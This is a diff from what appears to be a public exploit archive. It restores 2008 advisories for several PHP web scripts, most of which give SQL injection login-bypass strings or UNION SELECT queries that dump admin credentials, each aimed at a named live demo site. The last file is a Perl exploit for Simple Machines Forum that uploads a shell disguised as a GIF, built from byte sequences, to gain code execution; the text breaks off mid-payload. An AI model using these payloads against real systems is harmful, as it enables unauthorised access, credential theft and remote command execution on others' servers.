+//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+//ALLAH,forgimme...
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+exit(); //EoX
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7004.txt b/platforms/php/webapps/7004.txt
index 17d5eb0df..0cae3c623 100755
--- a/platforms/php/webapps/7004.txt
+++ b/platforms/php/webapps/7004.txt
@@ -1,35 +1,35 @@
- Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability
-___________________________________
-
-Author: Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-MaiL : darkangeL_G85@Yahoo.CoM
-___________________________________
-
-script    : http://www.preproject.com/projectDetail.asp?projectID=240
-
-_____
-
-ExploiT
-_______
-
-http://www.uaebis.com/cms/siteadmin/adminlogin.php
-
-exploit > Bypass
-______________
-
-user : admin ' or ' 1=1
-pass: hussin-X
-
-
-
-
-
-Greetz : All my freind
-
-
-  Im IraQi        |         Im TrYaGi
-
-# milw0rm.com [2008-11-05]
+ Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability
+___________________________________
+
+Author: Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+MaiL : darkangeL_G85@Yahoo.CoM
+___________________________________
+
+script    : http://www.preproject.com/projectDetail.asp?projectID=240
+
+_____
+
+ExploiT
+_______
+
+http://www.uaebis.com/cms/siteadmin/adminlogin.php
+
+exploit > Bypass
+______________
+
+user : admin ' or ' 1=1
+pass: hussin-X
+
+
+
+
+
+Greetz : All my freind
+
+
+  Im IraQi        |         Im TrYaGi
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7005.txt b/platforms/php/webapps/7005.txt
index 50b4c2508..39ae01cc6 100755
--- a/platforms/php/webapps/7005.txt
+++ b/platforms/php/webapps/7005.txt
@@ -1,62 +1,62 @@
-*********************************************************************************************        
-[!]                                                                                       [!]
-[!] OOOO             O                                 OOOOOOOOO                          [!]
-[!]O    O            O                                 O      O                           [!]
-[!]O                 O                                       O                            [!]
-[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
-[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
-[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
-[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
-[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
-[!]          OO                                                                           [!]
-[!]         OO                                                                            [!]
-[!]        OO                          Proud To Be MoroCCaN                               [!]
-[!]       OO                                                                              [!]
-*********************************************************************************************
-Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
----------------------------------------------------------------------------------------------
-=              Pre Job Board Pro (id) Remote Admin Bypass Vulnerability                     =
----------------------------------------------------------------------------------------------
-
----------------------------------------------------------------------------------------------
--===========================================================================================-
--=                  Discovred By : Cyber-Zone                                          =-
--=                                                                                         =-
--=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
--=                                                                                         =-
--=                  Home : WwW.IQ-Ty.CoM                                                   =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Download : http://preproject.com
-
-
-Bypass :
-
-Go To Admin Panel :
-
-Login With this information :
-
-Admin : admin ' or ' 1=1
-pass  : Cyber-Zone or any thing
-
-Leged in :)
-
-Live demo :
-
-http://preproject.com/jobdemo/siteadmin/index.php
-
-EnjoY
-
-
----------------------------------------------------------------------------------------------
--======================================= ThanX To ==========================================-
--=                 Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord         =-
--=                                                                                         =-
--=                         The_5pectrum  , (JIKO)  No-Exploit                              =-
--=                                                                                         =-
--=                               Oujda SeCurity TeaM                                       =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-05]
+*********************************************************************************************        
+[!]                                                                                       [!]
+[!] OOOO             O                                 OOOOOOOOO                          [!]
+[!]O    O            O                                 O      O                           [!]
+[!]O                 O                                       O                            [!]
+[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
+[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
+[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
+[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
+[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
+[!]          OO                                                                           [!]
+[!]         OO                                                                            [!]
+[!]        OO                          Proud To Be MoroCCaN                               [!]
+[!]       OO                                                                              [!]
+*********************************************************************************************
+Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
+---------------------------------------------------------------------------------------------
+=              Pre Job Board Pro (id) Remote Admin Bypass Vulnerability                     =
+---------------------------------------------------------------------------------------------
+
+---------------------------------------------------------------------------------------------
+-===========================================================================================-
+-=                  Discovred By : Cyber-Zone                                          =-
+-=                                                                                         =-
+-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
+-=                                                                                         =-
+-=                  Home : WwW.IQ-Ty.CoM                                                   =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Download : http://preproject.com
+
+
+Bypass :
+
+Go To Admin Panel :
+
+Login With this information :
+
+Admin : admin ' or ' 1=1
+pass  : Cyber-Zone or any thing
+
+Leged in :)
+
+Live demo :
+
+http://preproject.com/jobdemo/siteadmin/index.php
+
+EnjoY
+
+
+---------------------------------------------------------------------------------------------
+-======================================= ThanX To ==========================================-
+-=                 Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord         =-
+-=                                                                                         =-
+-=                         The_5pectrum  , (JIKO)  No-Exploit                              =-
+-=                                                                                         =-
+-=                               Oujda SeCurity TeaM                                       =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7007.txt b/platforms/php/webapps/7007.txt
index c77cc3044..78fe58ea9 100755
--- a/platforms/php/webapps/7007.txt
+++ b/platforms/php/webapps/7007.txt
@@ -1,26 +1,26 @@
-===========================================
-Drinks script.
---------------------------------------------------------------------------------------
-Vendor:     http://www.fivedollarscripts.com
-Demo:       http://www.fivedollarscripts.com/drinks/index.php
-Notified:     No. Probably don't care.
-Price:        Five bones.
-============================================
-
-Exploit:
-/path/index.php?cmd=6&recid=null union all select
-1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
-drinksadmin--
-
-Live Demo:
-http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
-union all select
-1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
-drinksadmin--
-
-contact: x.s7acy at gmail dot com
-greetings to bobthejanitor, mason, that new president guy, and the rest.
-first script blah blah blah
-=============================================
-
-# milw0rm.com [2008-11-05]
+===========================================
+Drinks script.
+--------------------------------------------------------------------------------------
+Vendor:     http://www.fivedollarscripts.com
+Demo:       http://www.fivedollarscripts.com/drinks/index.php
+Notified:     No. Probably don't care.
+Price:        Five bones.
+============================================
+
+Exploit:
+/path/index.php?cmd=6&recid=null union all select
+1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
+drinksadmin--
+
+Live Demo:
+http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
+union all select
+1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
+drinksadmin--
+
+contact: x.s7acy at gmail dot com
+greetings to bobthejanitor, mason, that new president guy, and the rest.
+first script blah blah blah
+=============================================
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7008.txt b/platforms/php/webapps/7008.txt
index 16f758177..90c18c34b 100755
--- a/platforms/php/webapps/7008.txt
+++ b/platforms/php/webapps/7008.txt
@@ -1,62 +1,62 @@
-*********************************************************************************************        
-[!]                                                                                       [!]
-[!] OOOO             O                                 OOOOOOOOO                          [!]
-[!]O    O            O                                 O      O                           [!]
-[!]O                 O                                       O                            [!]
-[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
-[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
-[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
-[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
-[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
-[!]          OO                                                                           [!]
-[!]         OO                                                                            [!]
-[!]        OO                          Proud To Be MoroCCaN                               [!]
-[!]       OO                                                                              [!]
-*********************************************************************************************
-Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
----------------------------------------------------------------------------------------------
-=              Pre Real Estate Listings Remote Admin Bypass Vulnerability                   =
----------------------------------------------------------------------------------------------
-
----------------------------------------------------------------------------------------------
--===========================================================================================-
--=                  Discovred By : Cyber-Zone                                          =-
--=                                                                                         =-
--=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
--=                                                                                         =-
--=                  Home : WwW.IQ-Ty.CoM                                                   =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Download : http://preproject.com
-
-
-Bypass :
-
-Go To Admin Panel :
-
-Login With this information :
-
-Admin : admin ' or ' 1=1
-pass  : Cyber-Zone or any thing
-
-Loged in :)
-
-Live demo :
-
-http://preproject.com/ulisting/manager/login.php
-
-EnjoY
-
-
----------------------------------------------------------------------------------------------
--======================================= ThanX To ==========================================-
--=                 Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord         =-
--=                                                                                         =-
--=                         The_5pectrum  , (JIKO)  No-Exploit                              =-
--=                                                                                         =-
--=                               Oujda SeCurity TeaM                                       =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-05]
+*********************************************************************************************        
+[!]                                                                                       [!]
+[!] OOOO             O                                 OOOOOOOOO                          [!]
+[!]O    O            O                                 O      O                           [!]
+[!]O                 O                                       O                            [!]
+[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
+[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
+[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
+[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
+[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
+[!]          OO                                                                           [!]
+[!]         OO                                                                            [!]
+[!]        OO                          Proud To Be MoroCCaN                               [!]
+[!]       OO                                                                              [!]
+*********************************************************************************************
+Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
+---------------------------------------------------------------------------------------------
+=              Pre Real Estate Listings Remote Admin Bypass Vulnerability                   =
+---------------------------------------------------------------------------------------------
+
+---------------------------------------------------------------------------------------------
+-===========================================================================================-
+-=                  Discovred By : Cyber-Zone                                          =-
+-=                                                                                         =-
+-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
+-=                                                                                         =-
+-=                  Home : WwW.IQ-Ty.CoM                                                   =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Download : http://preproject.com
+
+
+Bypass :
+
+Go To Admin Panel :
+
+Login With this information :
+
+Admin : admin ' or ' 1=1
+pass  : Cyber-Zone or any thing
+
+Loged in :)
+
+Live demo :
+
+http://preproject.com/ulisting/manager/login.php
+
+EnjoY
+
+
+---------------------------------------------------------------------------------------------
+-======================================= ThanX To ==========================================-
+-=                 Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord         =-
+-=                                                                                         =-
+-=                         The_5pectrum  , (JIKO)  No-Exploit                              =-
+-=                                                                                         =-
+-=                               Oujda SeCurity TeaM                                       =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7009.txt b/platforms/php/webapps/7009.txt
index 3352b99e1..1cba7fdf0 100755
--- a/platforms/php/webapps/7009.txt
+++ b/platforms/php/webapps/7009.txt
@@ -1,59 +1,58 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script      : mole-group Airline Ticket Script
-
-<<->> script demo : www.mole-group.com/content/view/57/72             
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>
-
-          >>>> http://airline.mole-group.com/info.php?flight=[sql]
- 
-       ex >>>> http://airline.mole-group.com/info.php?flight=-60'+union+select+convert(user()+using+latin1),0,0,0,0,0,0,0,0,0,0,0,0/*
-          
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-# milw0rm.com [2008-11-05]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script      : mole-group Airline Ticket Script
+
+<<->> script demo : www.mole-group.com/content/view/57/72             
+
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>
+
+          >>>> http://airline.mole-group.com/info.php?flight=[sql]
+ 
+       ex >>>> http://airline.mole-group.com/info.php?flight=-60'+union+select+convert(user()+using+latin1),0,0,0,0,0,0,0,0,0,0,0,0/*
+          
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7010.txt b/platforms/php/webapps/7010.txt
index 4dfa6e888..e7ec996eb 100755
--- a/platforms/php/webapps/7010.txt
+++ b/platforms/php/webapps/7010.txt
@@ -1,65 +1,64 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script      : mole-group Taxi Calc Dist Script
-
-<<->> script demo : www.mole-group.com/content/view/59/74            
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>> 
-
-          >>>> http://taxicalc.mole-group.com/login.php
-
- >>>> Bypass
- 
-        >>>> http://taxicalc.mole-group.com/login.php
-        
-        >>> user : cyb3r-1st ' or ' 1=1--
-        
-        >>> pass : cyb3r-1st
-          
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-# milw0rm.com [2008-11-05]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script      : mole-group Taxi Calc Dist Script
+
+<<->> script demo : www.mole-group.com/content/view/59/74            
+
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>> 
+
+          >>>> http://taxicalc.mole-group.com/login.php
+
+ >>>> Bypass
+ 
+        >>>> http://taxicalc.mole-group.com/login.php
+        
+        >>> user : cyb3r-1st ' or ' 1=1--
+        
+        >>> pass : cyb3r-1st
+          
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+# milw0rm.com [2008-11-05]
diff --git a/platforms/php/webapps/7011.pl b/platforms/php/webapps/7011.pl
index b1fbede18..c80b43995 100755
--- a/platforms/php/webapps/7011.pl
+++ b/platforms/php/webapps/7011.pl
@@ -1,284 +1,284 @@
-#!/usr/bin/perl
-#
-# @title: Simple Machines Forum Code Execution
-# @versn: * <= 1.1.6
-# @authr: ~elmysterio ( a.k.a us )
-# @stats: DROPPED!!!!!!!
-# @descp: In loving memory of the rare bone marrow disease that killed rgod. 
-#         We can't thank you enough for killing a bug killer. 
-# @bug  : Sources/QueryString.php  & Sources/Themes.php w/ magic_quotes == Off
-# @gr33t: m0rt's failure,  it never stops.
-#   
-# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
-# -s http://localhost/audit/smf116 -u regular -p test -d
-# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
-# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
-# [ii] User Id = 2
-# [ii] Uploaded a shell...
-# [cmd@win32]$ ver
-# 
-# Microsoft Windows XP [Version 5.1.2600]
-# 
-# [cmd@win32]$
-#
-#  FOR LULZ PURPOSE ONLY!!
-#
-use strict;
-use warnings;
-use LWP::UserAgent;
-use HTTP::Request::Common;
-use Getopt::Long qw(:config no_ignore_case);
-
-print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";
-
-my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
-my %parms = (	s => "",
-        		d => 0,
-        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
-        		u => "Gl0ria!!!",
-        		p => "gl0ria\@herb3st" );
-
-GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s"; 
-
-if( !$parms{s} ) {
-		die <
-	[-s]    Site        -> http://site.com/forums
-	[-x]	Proxy       -> localhost:8118
-	[-u]	Username    -> Gl0ria!!!
-	[-p]    Password    -> gl0ria\@herb3st
-	[-d]    Debug
-HELP
-}
-
-my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
-			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
-			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
-			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
-			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
-			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00). 
-			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
-			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00); $shell .= <<'EXIF';
-
-EXIF
-			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
-			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
-			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
-			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
-			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
-			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
-			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
-			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
-			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
-			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
-			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
-			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
-			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
-			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
-			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
-			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
-			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
-			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
-			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
-			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
-			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
-			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
-			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
-			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
-			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
-			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
-			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
-			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
-			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
-			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
-			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
-			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
